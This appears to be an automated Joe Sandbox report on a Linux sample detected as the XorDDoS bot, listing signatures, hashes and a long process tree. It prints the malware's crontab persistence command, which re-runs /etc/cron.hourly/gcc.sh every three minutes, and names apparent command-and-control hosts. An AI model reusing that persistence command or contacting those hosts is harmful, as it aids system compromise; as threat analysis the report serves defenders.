Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
iJl2Sb6qRa

Overview

General Information

Sample Name:iJl2Sb6qRa
Original Sample Name:8a1feca84fe6d3d011c183a32c1f48b1edb6c98f2d411f0e83038659a3e274c0
Analysis ID:841187
MD5:58881cdfffced4e9013ee3ffe4fdc941
SHA1:425c413c1ab4e1891d85334bdd05ca279ceea127
SHA256:8a1feca84fe6d3d011c183a32c1f48b1edb6c98f2d411f0e83038659a3e274c0
Infos:

Detection

XorDDoS
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Yara detected XorDDoS Bot
Snort IDS alert for network traffic
Sample tries to persist itself using System V runlevels
Machine Learning detection for dropped file
Sample tries to persist itself using cron
Drops files in suspicious directories
Sample deletes itself
Machine Learning detection for sample
Writes ELF files to disk
Yara signature match
Drops files with innocent-looking names
PID-file does not contain an ASCII number
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
Reads CPU information from /proc indicative of miner or evasive malware
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox Version:37.0.0 Beryl
Analysis ID:841187
Start date and time:2023-04-04 19:52:22 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 26s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Sample file name:iJl2Sb6qRa
Original Sample Name:8a1feca84fe6d3d011c183a32c1f48b1edb6c98f2d411f0e83038659a3e274c0
Detection:MAL
Classification:mal100.troj.evad.lin@0/22@2/0
  • VT rate limit hit for: /etc/cron.hourly/gcc.sh
  • VT rate limit hit for: http://aa.hostasa.org/config.rar
  • VT rate limit hit for: http://aa.hostasa.org/config.rartat456.com:1522
  • VT rate limit hit for: http://aa.hostasa.org/config.rartat456.com:1522
  • VT rate limit hit for: ppp.gggatat456.com:1522
Command:/tmp/iJl2Sb6qRa
PID:9451
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu1
  • iJl2Sb6qRa (PID: 9451, Parent: 9383, MD5: 58881cdfffced4e9013ee3ffe4fdc941) Arguments: /tmp/iJl2Sb6qRa
    • iJl2Sb6qRa New Fork (PID: 9452, Parent: 9451)
      • iJl2Sb6qRa New Fork (PID: 9462, Parent: 9452)
        • update-rc.d (PID: 9463, Parent: 9462, MD5: e9e125904f9ed8ff4c8504a55a149005) Arguments: /usr/bin/perl /usr/sbin/update-rc.d iJl2Sb6qRa defaults
          • insserv (PID: 9490, Parent: 9463, MD5: 34c11674a0b29347001640aeae7c94f1) Arguments: /usr/lib/insserv/insserv iJl2Sb6qRa
          • systemctl (PID: 9543, Parent: 9463, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl daemon-reload
      • dash (PID: 9474, Parent: 9452, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
        • dash New Fork (PID: 9479, Parent: 9474)
        • sed (PID: 9479, Parent: 9474, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
      • iJl2Sb6qRa New Fork (PID: 9552, Parent: 9452)
        • lsodknzpps (PID: 9553, Parent: 9552, MD5: a48ef1e0784bbcadf9025524cdf26387) Arguments: /usr/bin/lsodknzpps ls 9452
      • iJl2Sb6qRa New Fork (PID: 9563, Parent: 9452)
        • lsodknzpps (PID: 9564, Parent: 9563, MD5: a48ef1e0784bbcadf9025524cdf26387) Arguments: /usr/bin/lsodknzpps sh 9452
      • iJl2Sb6qRa New Fork (PID: 9574, Parent: 9452)
        • lsodknzpps (PID: 9575, Parent: 9574, MD5: a48ef1e0784bbcadf9025524cdf26387) Arguments: /usr/bin/lsodknzpps su 9452
      • iJl2Sb6qRa New Fork (PID: 9585, Parent: 9452)
        • lsodknzpps (PID: 9586, Parent: 9585, MD5: a48ef1e0784bbcadf9025524cdf26387) Arguments: /usr/bin/lsodknzpps id 9452
      • iJl2Sb6qRa New Fork (PID: 9596, Parent: 9452)
        • lsodknzpps (PID: 9597, Parent: 9596, MD5: a48ef1e0784bbcadf9025524cdf26387) Arguments: /usr/bin/lsodknzpps id 9452
      • iJl2Sb6qRa New Fork (PID: 9607, Parent: 9452)
        • cjfywultqo (PID: 9608, Parent: 9607, MD5: 90caf41492792c802131af2baa7a0bd1) Arguments: /usr/bin/cjfywultqo top 9452
      • iJl2Sb6qRa New Fork (PID: 9618, Parent: 9452)
        • cjfywultqo (PID: 9619, Parent: 9618, MD5: 90caf41492792c802131af2baa7a0bd1) Arguments: /usr/bin/cjfywultqo "ps -ef" 9452
      • iJl2Sb6qRa New Fork (PID: 9629, Parent: 9452)
        • cjfywultqo (PID: 9630, Parent: 9629, MD5: 90caf41492792c802131af2baa7a0bd1) Arguments: /usr/bin/cjfywultqo "cat resolv.conf" 9452
      • iJl2Sb6qRa New Fork (PID: 9640, Parent: 9452)
        • cjfywultqo (PID: 9641, Parent: 9640, MD5: 90caf41492792c802131af2baa7a0bd1) Arguments: /usr/bin/cjfywultqo id 9452
      • iJl2Sb6qRa New Fork (PID: 9651, Parent: 9452)
        • cjfywultqo (PID: 9652, Parent: 9651, MD5: 90caf41492792c802131af2baa7a0bd1) Arguments: /usr/bin/cjfywultqo whoami 9452
      • iJl2Sb6qRa New Fork (PID: 9662, Parent: 9452)
        • ckxgqrmzxa (PID: 9663, Parent: 9662, MD5: 9ca1940212fee4aa01a0d75859be67ad) Arguments: /usr/bin/ckxgqrmzxa uptime 9452
      • iJl2Sb6qRa New Fork (PID: 9673, Parent: 9452)
        • ckxgqrmzxa (PID: 9674, Parent: 9673, MD5: 9ca1940212fee4aa01a0d75859be67ad) Arguments: /usr/bin/ckxgqrmzxa uptime 9452
      • iJl2Sb6qRa New Fork (PID: 9684, Parent: 9452)
        • ckxgqrmzxa (PID: 9685, Parent: 9684, MD5: 9ca1940212fee4aa01a0d75859be67ad) Arguments: /usr/bin/ckxgqrmzxa "sleep 1" 9452
      • iJl2Sb6qRa New Fork (PID: 9695, Parent: 9452)
        • ckxgqrmzxa (PID: 9696, Parent: 9695, MD5: 9ca1940212fee4aa01a0d75859be67ad) Arguments: /usr/bin/ckxgqrmzxa uptime 9452
      • iJl2Sb6qRa New Fork (PID: 9706, Parent: 9452)
        • ckxgqrmzxa (PID: 9707, Parent: 9706, MD5: 9ca1940212fee4aa01a0d75859be67ad) Arguments: /usr/bin/ckxgqrmzxa "cd /etc" 9452
      • iJl2Sb6qRa New Fork (PID: 9717, Parent: 9452)
        • dezqblvxuy (PID: 9718, Parent: 9717, MD5: 28855a67a8446c5a6d01b3b3bf0b4b52) Arguments: /usr/bin/dezqblvxuy "cd /etc" 9452
      • iJl2Sb6qRa New Fork (PID: 9728, Parent: 9452)
        • dezqblvxuy (PID: 9729, Parent: 9728, MD5: 28855a67a8446c5a6d01b3b3bf0b4b52) Arguments: /usr/bin/dezqblvxuy "netstat -antop" 9452
      • iJl2Sb6qRa New Fork (PID: 9739, Parent: 9452)
        • dezqblvxuy (PID: 9740, Parent: 9739, MD5: 28855a67a8446c5a6d01b3b3bf0b4b52) Arguments: /usr/bin/dezqblvxuy "netstat -an" 9452
      • iJl2Sb6qRa New Fork (PID: 9750, Parent: 9452)
        • dezqblvxuy (PID: 9751, Parent: 9750, MD5: 28855a67a8446c5a6d01b3b3bf0b4b52) Arguments: /usr/bin/dezqblvxuy "ps -ef" 9452
      • iJl2Sb6qRa New Fork (PID: 9761, Parent: 9452)
        • dezqblvxuy (PID: 9762, Parent: 9761, MD5: 28855a67a8446c5a6d01b3b3bf0b4b52) Arguments: /usr/bin/dezqblvxuy pwd 9452
      • iJl2Sb6qRa New Fork (PID: 9772, Parent: 9452)
        • hgfzmygnbx (PID: 9773, Parent: 9772, MD5: 872880f6f7422435ae6d1eaefe04a5a4) Arguments: /usr/bin/hgfzmygnbx "cat resolv.conf" 9452
      • iJl2Sb6qRa New Fork (PID: 9783, Parent: 9452)
        • hgfzmygnbx (PID: 9784, Parent: 9783, MD5: 872880f6f7422435ae6d1eaefe04a5a4) Arguments: /usr/bin/hgfzmygnbx top 9452
      • iJl2Sb6qRa New Fork (PID: 9794, Parent: 9452)
        • hgfzmygnbx (PID: 9795, Parent: 9794, MD5: 872880f6f7422435ae6d1eaefe04a5a4) Arguments: /usr/bin/hgfzmygnbx sh 9452
      • iJl2Sb6qRa New Fork (PID: 9805, Parent: 9452)
        • hgfzmygnbx (PID: 9806, Parent: 9805, MD5: 872880f6f7422435ae6d1eaefe04a5a4) Arguments: /usr/bin/hgfzmygnbx uptime 9452
      • iJl2Sb6qRa New Fork (PID: 9816, Parent: 9452)
        • hgfzmygnbx (PID: 9817, Parent: 9816, MD5: 872880f6f7422435ae6d1eaefe04a5a4) Arguments: /usr/bin/hgfzmygnbx "cat resolv.conf" 9452
      • iJl2Sb6qRa New Fork (PID: 9827, Parent: 9452)
        • lnmgbribvb (PID: 9828, Parent: 9827, MD5: a2eda8f3694ef7eb8b04888e5ed38a24) Arguments: /usr/bin/lnmgbribvb pwd 9452
      • iJl2Sb6qRa New Fork (PID: 9838, Parent: 9452)
        • lnmgbribvb (PID: 9839, Parent: 9838, MD5: a2eda8f3694ef7eb8b04888e5ed38a24) Arguments: /usr/bin/lnmgbribvb bash 9452
      • iJl2Sb6qRa New Fork (PID: 9849, Parent: 9452)
        • lnmgbribvb (PID: 9850, Parent: 9849, MD5: a2eda8f3694ef7eb8b04888e5ed38a24) Arguments: /usr/bin/lnmgbribvb top 9452
      • iJl2Sb6qRa New Fork (PID: 9860, Parent: 9452)
        • lnmgbribvb (PID: 9861, Parent: 9860, MD5: a2eda8f3694ef7eb8b04888e5ed38a24) Arguments: /usr/bin/lnmgbribvb id 9452
      • iJl2Sb6qRa New Fork (PID: 9871, Parent: 9452)
        • lnmgbribvb (PID: 9872, Parent: 9871, MD5: a2eda8f3694ef7eb8b04888e5ed38a24) Arguments: /usr/bin/lnmgbribvb su 9452
      • iJl2Sb6qRa New Fork (PID: 9882, Parent: 9452)
        • wdcujvrbpo (PID: 9883, Parent: 9882, MD5: 635da966c3034a8039505f87e4bd322d) Arguments: /usr/bin/wdcujvrbpo uptime 9452
      • iJl2Sb6qRa New Fork (PID: 9893, Parent: 9452)
        • wdcujvrbpo (PID: 9894, Parent: 9893, MD5: 635da966c3034a8039505f87e4bd322d) Arguments: /usr/bin/wdcujvrbpo "ps -ef" 9452
      • iJl2Sb6qRa New Fork (PID: 9904, Parent: 9452)
        • wdcujvrbpo (PID: 9905, Parent: 9904, MD5: 635da966c3034a8039505f87e4bd322d) Arguments: /usr/bin/wdcujvrbpo "cd /etc" 9452
      • iJl2Sb6qRa New Fork (PID: 9915, Parent: 9452)
        • wdcujvrbpo (PID: 9916, Parent: 9915, MD5: 635da966c3034a8039505f87e4bd322d) Arguments: /usr/bin/wdcujvrbpo uptime 9452
      • iJl2Sb6qRa New Fork (PID: 9926, Parent: 9452)
        • wdcujvrbpo (PID: 9927, Parent: 9926, MD5: 635da966c3034a8039505f87e4bd322d) Arguments: /usr/bin/wdcujvrbpo top 9452
      • iJl2Sb6qRa New Fork (PID: 9937, Parent: 9452)
        • zbksjhrfms (PID: 9938, Parent: 9937, MD5: 882c9b8e9ce35602db8fa3bc5ada4cc0) Arguments: /usr/bin/zbksjhrfms "netstat -antop" 9452
      • iJl2Sb6qRa New Fork (PID: 9948, Parent: 9452)
        • zbksjhrfms (PID: 9949, Parent: 9948, MD5: 882c9b8e9ce35602db8fa3bc5ada4cc0) Arguments: /usr/bin/zbksjhrfms "echo \"find\"" 9452
      • iJl2Sb6qRa New Fork (PID: 9959, Parent: 9452)
        • zbksjhrfms (PID: 9960, Parent: 9959, MD5: 882c9b8e9ce35602db8fa3bc5ada4cc0) Arguments: /usr/bin/zbksjhrfms top 9452
      • iJl2Sb6qRa New Fork (PID: 9970, Parent: 9452)
        • zbksjhrfms (PID: 9971, Parent: 9970, MD5: 882c9b8e9ce35602db8fa3bc5ada4cc0) Arguments: /usr/bin/zbksjhrfms bash 9452
      • iJl2Sb6qRa New Fork (PID: 9981, Parent: 9452)
        • zbksjhrfms (PID: 9982, Parent: 9981, MD5: 882c9b8e9ce35602db8fa3bc5ada4cc0) Arguments: /usr/bin/zbksjhrfms "cat resolv.conf" 9452
      • iJl2Sb6qRa New Fork (PID: 9994, Parent: 9452)
        • eoqlmyvucn (PID: 9995, Parent: 9994, MD5: 7421c1f0ece93b4321a3809440512935) Arguments: /usr/bin/eoqlmyvucn "netstat -antop" 9452
      • iJl2Sb6qRa New Fork (PID: 10005, Parent: 9452)
        • eoqlmyvucn (PID: 10006, Parent: 10005, MD5: 7421c1f0ece93b4321a3809440512935) Arguments: /usr/bin/eoqlmyvucn "netstat -an" 9452
      • iJl2Sb6qRa New Fork (PID: 10016, Parent: 9452)
        • eoqlmyvucn (PID: 10017, Parent: 10016, MD5: 7421c1f0ece93b4321a3809440512935) Arguments: /usr/bin/eoqlmyvucn top 9452
      • iJl2Sb6qRa New Fork (PID: 10027, Parent: 9452)
        • eoqlmyvucn (PID: 10028, Parent: 10027, MD5: 7421c1f0ece93b4321a3809440512935) Arguments: /usr/bin/eoqlmyvucn "cd /etc" 9452
      • iJl2Sb6qRa New Fork (PID: 10038, Parent: 9452)
        • eoqlmyvucn (PID: 10039, Parent: 10038, MD5: 7421c1f0ece93b4321a3809440512935) Arguments: /usr/bin/eoqlmyvucn "ls -la" 9452
      • iJl2Sb6qRa New Fork (PID: 10049, Parent: 9452)
        • wzhmvohlxs (PID: 10050, Parent: 10049, MD5: 8816cee3c946563644ff93e94d5ffa35) Arguments: /usr/bin/wzhmvohlxs uptime 9452
      • iJl2Sb6qRa New Fork (PID: 10060, Parent: 9452)
        • wzhmvohlxs (PID: 10061, Parent: 10060, MD5: 8816cee3c946563644ff93e94d5ffa35) Arguments: /usr/bin/wzhmvohlxs "netstat -antop" 9452
      • iJl2Sb6qRa New Fork (PID: 10071, Parent: 9452)
        • wzhmvohlxs (PID: 10072, Parent: 10071, MD5: 8816cee3c946563644ff93e94d5ffa35) Arguments: /usr/bin/wzhmvohlxs ifconfig 9452
      • iJl2Sb6qRa New Fork (PID: 10082, Parent: 9452)
        • wzhmvohlxs (PID: 10083, Parent: 10082, MD5: 8816cee3c946563644ff93e94d5ffa35) Arguments: /usr/bin/wzhmvohlxs ifconfig 9452
      • iJl2Sb6qRa New Fork (PID: 10093, Parent: 9452)
        • wzhmvohlxs (PID: 10094, Parent: 10093, MD5: 8816cee3c946563644ff93e94d5ffa35) Arguments: /usr/bin/wzhmvohlxs "ifconfig eth0" 9452
      • iJl2Sb6qRa New Fork (PID: 10104, Parent: 9452)
        • hiueshutol (PID: 10105, Parent: 10104, MD5: 5ca107404275778ca2b07a8590d03272) Arguments: /usr/bin/hiueshutol "sleep 1" 9452
      • iJl2Sb6qRa New Fork (PID: 10115, Parent: 9452)
        • hiueshutol (PID: 10116, Parent: 10115, MD5: 5ca107404275778ca2b07a8590d03272) Arguments: /usr/bin/hiueshutol "cat resolv.conf" 9452
      • iJl2Sb6qRa New Fork (PID: 10126, Parent: 9452)
        • hiueshutol (PID: 10127, Parent: 10126, MD5: 5ca107404275778ca2b07a8590d03272) Arguments: /usr/bin/hiueshutol uptime 9452
      • iJl2Sb6qRa New Fork (PID: 10137, Parent: 9452)
        • hiueshutol (PID: 10138, Parent: 10137, MD5: 5ca107404275778ca2b07a8590d03272) Arguments: /usr/bin/hiueshutol "route -n" 9452
      • iJl2Sb6qRa New Fork (PID: 10148, Parent: 9452)
        • hiueshutol (PID: 10149, Parent: 10148, MD5: 5ca107404275778ca2b07a8590d03272) Arguments: /usr/bin/hiueshutol ifconfig 9452
      • iJl2Sb6qRa New Fork (PID: 10159, Parent: 9452)
        • mhvrcmaysv (PID: 10160, Parent: 10159, MD5: 9b1da24294ced34670c702e0fdefa42b) Arguments: /usr/bin/mhvrcmaysv "cat resolv.conf" 9452
      • iJl2Sb6qRa New Fork (PID: 10170, Parent: 9452)
        • mhvrcmaysv (PID: 10171, Parent: 10170, MD5: 9b1da24294ced34670c702e0fdefa42b) Arguments: /usr/bin/mhvrcmaysv "ls -la" 9452
      • iJl2Sb6qRa New Fork (PID: 10181, Parent: 9452)
        • mhvrcmaysv (PID: 10182, Parent: 10181, MD5: 9b1da24294ced34670c702e0fdefa42b) Arguments: /usr/bin/mhvrcmaysv top 9452
      • iJl2Sb6qRa New Fork (PID: 10192, Parent: 9452)
        • mhvrcmaysv (PID: 10193, Parent: 10192, MD5: 9b1da24294ced34670c702e0fdefa42b) Arguments: /usr/bin/mhvrcmaysv "netstat -antop" 9452
      • iJl2Sb6qRa New Fork (PID: 10203, Parent: 9452)
        • mhvrcmaysv (PID: 10204, Parent: 10203, MD5: 9b1da24294ced34670c702e0fdefa42b) Arguments: /usr/bin/mhvrcmaysv "ifconfig eth0" 9452
      • iJl2Sb6qRa New Fork (PID: 10214, Parent: 9452)
        • chdmwyeiia (PID: 10215, Parent: 10214, MD5: c71c4deef5f37dfdbf1ca7d11b856b4e) Arguments: /usr/bin/chdmwyeiia "ifconfig eth0" 9452
      • iJl2Sb6qRa New Fork (PID: 10225, Parent: 9452)
        • chdmwyeiia (PID: 10226, Parent: 10225, MD5: c71c4deef5f37dfdbf1ca7d11b856b4e) Arguments: /usr/bin/chdmwyeiia "ls -la" 9452
      • iJl2Sb6qRa New Fork (PID: 10236, Parent: 9452)
        • chdmwyeiia (PID: 10237, Parent: 10236, MD5: c71c4deef5f37dfdbf1ca7d11b856b4e) Arguments: /usr/bin/chdmwyeiia who 9452
      • iJl2Sb6qRa New Fork (PID: 10247, Parent: 9452)
        • chdmwyeiia (PID: 10248, Parent: 10247, MD5: c71c4deef5f37dfdbf1ca7d11b856b4e) Arguments: /usr/bin/chdmwyeiia id 9452
      • iJl2Sb6qRa New Fork (PID: 10258, Parent: 9452)
        • chdmwyeiia (PID: 10259, Parent: 10258, MD5: c71c4deef5f37dfdbf1ca7d11b856b4e) Arguments: /usr/bin/chdmwyeiia "cd /etc" 9452
      • iJl2Sb6qRa New Fork (PID: 10269, Parent: 9452)
        • emnaztxelb (PID: 10270, Parent: 10269, MD5: 4f6482237e09cca4828411f8386581fc) Arguments: /usr/bin/emnaztxelb "netstat -an" 9452
      • iJl2Sb6qRa New Fork (PID: 10280, Parent: 9452)
        • emnaztxelb (PID: 10281, Parent: 10280, MD5: 4f6482237e09cca4828411f8386581fc) Arguments: /usr/bin/emnaztxelb "echo \"find\"" 9452
      • iJl2Sb6qRa New Fork (PID: 10291, Parent: 9452)
        • emnaztxelb (PID: 10292, Parent: 10291, MD5: 4f6482237e09cca4828411f8386581fc) Arguments: /usr/bin/emnaztxelb "sleep 1" 9452
      • iJl2Sb6qRa New Fork (PID: 10302, Parent: 9452)
        • emnaztxelb (PID: 10303, Parent: 10302, MD5: 4f6482237e09cca4828411f8386581fc) Arguments: /usr/bin/emnaztxelb "ifconfig eth0" 9452
      • iJl2Sb6qRa New Fork (PID: 10313, Parent: 9452)
        • emnaztxelb (PID: 10314, Parent: 10313, MD5: 4f6482237e09cca4828411f8386581fc) Arguments: /usr/bin/emnaztxelb "route -n" 9452
      • iJl2Sb6qRa New Fork (PID: 10324, Parent: 9452)
        • yimgbvpxre (PID: 10325, Parent: 10324, MD5: adef4f6dadd60e09a59e134c5a659f30) Arguments: /usr/bin/yimgbvpxre sh 9452
      • iJl2Sb6qRa New Fork (PID: 10335, Parent: 9452)
        • yimgbvpxre (PID: 10336, Parent: 10335, MD5: adef4f6dadd60e09a59e134c5a659f30) Arguments: /usr/bin/yimgbvpxre bash 9452
      • iJl2Sb6qRa New Fork (PID: 10346, Parent: 9452)
        • yimgbvpxre (PID: 10347, Parent: 10346, MD5: adef4f6dadd60e09a59e134c5a659f30) Arguments: /usr/bin/yimgbvpxre "grep \"A\"" 9452
      • iJl2Sb6qRa New Fork (PID: 10357, Parent: 9452)
        • yimgbvpxre (PID: 10358, Parent: 10357, MD5: adef4f6dadd60e09a59e134c5a659f30) Arguments: /usr/bin/yimgbvpxre "ifconfig eth0" 9452
      • iJl2Sb6qRa New Fork (PID: 10368, Parent: 9452)
        • yimgbvpxre (PID: 10369, Parent: 10368, MD5: adef4f6dadd60e09a59e134c5a659f30) Arguments: /usr/bin/yimgbvpxre "cat resolv.conf" 9452
      • iJl2Sb6qRa New Fork (PID: 10379, Parent: 9452)
        • hjqubeqdgt (PID: 10380, Parent: 10379, MD5: 3173c41f0c1b9dfa58d0d6379d71d08f) Arguments: /usr/bin/hjqubeqdgt uptime 9452
      • iJl2Sb6qRa New Fork (PID: 10390, Parent: 9452)
        • hjqubeqdgt (PID: 10391, Parent: 10390, MD5: 3173c41f0c1b9dfa58d0d6379d71d08f) Arguments: /usr/bin/hjqubeqdgt su 9452
      • iJl2Sb6qRa New Fork (PID: 10401, Parent: 9452)
        • hjqubeqdgt (PID: 10402, Parent: 10401, MD5: 3173c41f0c1b9dfa58d0d6379d71d08f) Arguments: /usr/bin/hjqubeqdgt "cd /etc" 9452
      • iJl2Sb6qRa New Fork (PID: 10412, Parent: 9452)
        • hjqubeqdgt (PID: 10413, Parent: 10412, MD5: 3173c41f0c1b9dfa58d0d6379d71d08f) Arguments: /usr/bin/hjqubeqdgt id 9452
      • iJl2Sb6qRa New Fork (PID: 10423, Parent: 9452)
        • hjqubeqdgt (PID: 10424, Parent: 10423, MD5: 3173c41f0c1b9dfa58d0d6379d71d08f) Arguments: /usr/bin/hjqubeqdgt "ifconfig eth0" 9452
      • iJl2Sb6qRa New Fork (PID: 10434, Parent: 9452)
        • tqltcdysxm (PID: 10435, Parent: 10434, MD5: 7d8d4986b078e4b4d548d598944da309) Arguments: /usr/bin/tqltcdysxm top 9452
      • iJl2Sb6qRa New Fork (PID: 10445, Parent: 9452)
        • tqltcdysxm (PID: 10446, Parent: 10445, MD5: 7d8d4986b078e4b4d548d598944da309) Arguments: /usr/bin/tqltcdysxm "route -n" 9452
      • iJl2Sb6qRa New Fork (PID: 10455, Parent: 9452)
        • tqltcdysxm (PID: 10457, Parent: 3310, MD5: 7d8d4986b078e4b4d548d598944da309) Arguments: /usr/bin/tqltcdysxm "netstat -antop" 9452
      • iJl2Sb6qRa New Fork (PID: 10458, Parent: 9452)
        • tqltcdysxm (PID: 10459, Parent: 3310, MD5: 7d8d4986b078e4b4d548d598944da309) Arguments: /usr/bin/tqltcdysxm gnome-terminal 9452
      • iJl2Sb6qRa New Fork (PID: 10461, Parent: 9452)
        • tqltcdysxm (PID: 10462, Parent: 10461, MD5: 7d8d4986b078e4b4d548d598944da309) Arguments: /usr/bin/tqltcdysxm "cat resolv.conf" 9452
      • iJl2Sb6qRa New Fork (PID: 10489, Parent: 9452)
        • ppcowopkho (PID: 10490, Parent: 3310, MD5: a05d99f8205a2f4eac9b068780a867b6) Arguments: /usr/bin/ppcowopkho top 9452
      • iJl2Sb6qRa New Fork (PID: 10491, Parent: 9452)
        • ppcowopkho (PID: 10493, Parent: 3310, MD5: a05d99f8205a2f4eac9b068780a867b6) Arguments: /usr/bin/ppcowopkho whoami 9452
      • iJl2Sb6qRa New Fork (PID: 10494, Parent: 9452)
        • ppcowopkho (PID: 10495, Parent: 3310, MD5: a05d99f8205a2f4eac9b068780a867b6) Arguments: /usr/bin/ppcowopkho ifconfig 9452
      • iJl2Sb6qRa New Fork (PID: 10496, Parent: 9452)
        • ppcowopkho (PID: 10499, Parent: 3310, MD5: a05d99f8205a2f4eac9b068780a867b6) Arguments: /usr/bin/ppcowopkho uptime 9452
      • iJl2Sb6qRa New Fork (PID: 10500, Parent: 9452)
        • ppcowopkho (PID: 10503, Parent: 3310, MD5: a05d99f8205a2f4eac9b068780a867b6) Arguments: /usr/bin/ppcowopkho sh 9452
      • iJl2Sb6qRa New Fork (PID: 10544, Parent: 9452)
        • fzsohllyia (PID: 10545, Parent: 3310, MD5: e56044b8511b441d2e35e614289e66cc) Arguments: /usr/bin/fzsohllyia top 9452
      • iJl2Sb6qRa New Fork (PID: 10546, Parent: 9452)
        • fzsohllyia (PID: 10547, Parent: 3310, MD5: e56044b8511b441d2e35e614289e66cc) Arguments: /usr/bin/fzsohllyia bash 9452
      • iJl2Sb6qRa New Fork (PID: 10549, Parent: 9452)
        • fzsohllyia (PID: 10551, Parent: 3310, MD5: e56044b8511b441d2e35e614289e66cc) Arguments: /usr/bin/fzsohllyia bash 9452
      • iJl2Sb6qRa New Fork (PID: 10552, Parent: 9452)
        • fzsohllyia (PID: 10555, Parent: 3310, MD5: e56044b8511b441d2e35e614289e66cc) Arguments: /usr/bin/fzsohllyia whoami 9452
      • iJl2Sb6qRa New Fork (PID: 10557, Parent: 9452)
        • fzsohllyia (PID: 10563, Parent: 3310, MD5: e56044b8511b441d2e35e614289e66cc) Arguments: /usr/bin/fzsohllyia ifconfig 9452
      • iJl2Sb6qRa New Fork (PID: 10601, Parent: 9452)
        • qkefrqjuaf (PID: 10602, Parent: 3310, MD5: c5c77fa56b7239e1b5fe8c0888e843f5) Arguments: /usr/bin/qkefrqjuaf su 9452
      • iJl2Sb6qRa New Fork (PID: 10603, Parent: 9452)
        • qkefrqjuaf (PID: 10604, Parent: 3310, MD5: c5c77fa56b7239e1b5fe8c0888e843f5) Arguments: /usr/bin/qkefrqjuaf su 9452
      • iJl2Sb6qRa New Fork (PID: 10605, Parent: 9452)
        • qkefrqjuaf (PID: 10607, Parent: 3310, MD5: c5c77fa56b7239e1b5fe8c0888e843f5) Arguments: /usr/bin/qkefrqjuaf "echo \"find\"" 9452
      • iJl2Sb6qRa New Fork (PID: 10609, Parent: 9452)
        • qkefrqjuaf (PID: 10610, Parent: 3310, MD5: c5c77fa56b7239e1b5fe8c0888e843f5) Arguments: /usr/bin/qkefrqjuaf "netstat -an" 9452
      • iJl2Sb6qRa New Fork (PID: 10611, Parent: 9452)
        • qkefrqjuaf (PID: 10616, Parent: 10611, MD5: c5c77fa56b7239e1b5fe8c0888e843f5) Arguments: /usr/bin/qkefrqjuaf "ls -la" 9452
      • iJl2Sb6qRa New Fork (PID: 10656, Parent: 9452)
        • rbihsknkpv (PID: 10657, Parent: 3310, MD5: 0288fab43e01f9089db9bbcb7cbe3ebd) Arguments: /usr/bin/rbihsknkpv ls 9452
      • iJl2Sb6qRa New Fork (PID: 10658, Parent: 9452)
        • rbihsknkpv (PID: 10659, Parent: 3310, MD5: 0288fab43e01f9089db9bbcb7cbe3ebd) Arguments: /usr/bin/rbihsknkpv ls 9452
      • iJl2Sb6qRa New Fork (PID: 10660, Parent: 9452)
        • rbihsknkpv (PID: 10663, Parent: 3310, MD5: 0288fab43e01f9089db9bbcb7cbe3ebd) Arguments: /usr/bin/rbihsknkpv id 9452
      • iJl2Sb6qRa New Fork (PID: 10664, Parent: 9452)
        • rbihsknkpv (PID: 10667, Parent: 3310, MD5: 0288fab43e01f9089db9bbcb7cbe3ebd) Arguments: /usr/bin/rbihsknkpv "grep \"A\"" 9452
      • iJl2Sb6qRa New Fork (PID: 10670, Parent: 9452)
        • rbihsknkpv (PID: 10674, Parent: 10670, MD5: 0288fab43e01f9089db9bbcb7cbe3ebd) Arguments: /usr/bin/rbihsknkpv who 9452
      • iJl2Sb6qRa New Fork (PID: 10711, Parent: 9452)
        • eqbvlwquue (PID: 10712, Parent: 3310, MD5: 5d3078f2fa3ca5271fd133aad642d232) Arguments: /usr/bin/eqbvlwquue "netstat -an" 9452
      • iJl2Sb6qRa New Fork (PID: 10713, Parent: 9452)
        • eqbvlwquue (PID: 10715, Parent: 3310, MD5: 5d3078f2fa3ca5271fd133aad642d232) Arguments: /usr/bin/eqbvlwquue su 9452
      • iJl2Sb6qRa New Fork (PID: 10717, Parent: 9452)
        • eqbvlwquue (PID: 10720, Parent: 3310, MD5: 5d3078f2fa3ca5271fd133aad642d232) Arguments: /usr/bin/eqbvlwquue "sleep 1" 9452
      • iJl2Sb6qRa New Fork (PID: 10723, Parent: 9452)
        • eqbvlwquue (PID: 10726, Parent: 3310, MD5: 5d3078f2fa3ca5271fd133aad642d232) Arguments: /usr/bin/eqbvlwquue "cd /etc" 9452
      • iJl2Sb6qRa New Fork (PID: 10727, Parent: 9452)
        • eqbvlwquue (PID: 10731, Parent: 3310, MD5: 5d3078f2fa3ca5271fd133aad642d232) Arguments: /usr/bin/eqbvlwquue "cat resolv.conf" 9452
      • iJl2Sb6qRa New Fork (PID: 10766, Parent: 9452)
        • xjmgjvgxwo (PID: 10767, Parent: 3310, MD5: 9faeab7565afcf89b3b068708d7e849f) Arguments: /usr/bin/xjmgjvgxwo uptime 9452
      • iJl2Sb6qRa New Fork (PID: 10768, Parent: 9452)
        • xjmgjvgxwo (PID: 10769, Parent: 3310, MD5: 9faeab7565afcf89b3b068708d7e849f) Arguments: /usr/bin/xjmgjvgxwo "cd /etc" 9452
      • iJl2Sb6qRa New Fork (PID: 10770, Parent: 9452)
        • xjmgjvgxwo (PID: 10771, Parent: 3310, MD5: 9faeab7565afcf89b3b068708d7e849f) Arguments: /usr/bin/xjmgjvgxwo "echo \"find\"" 9452
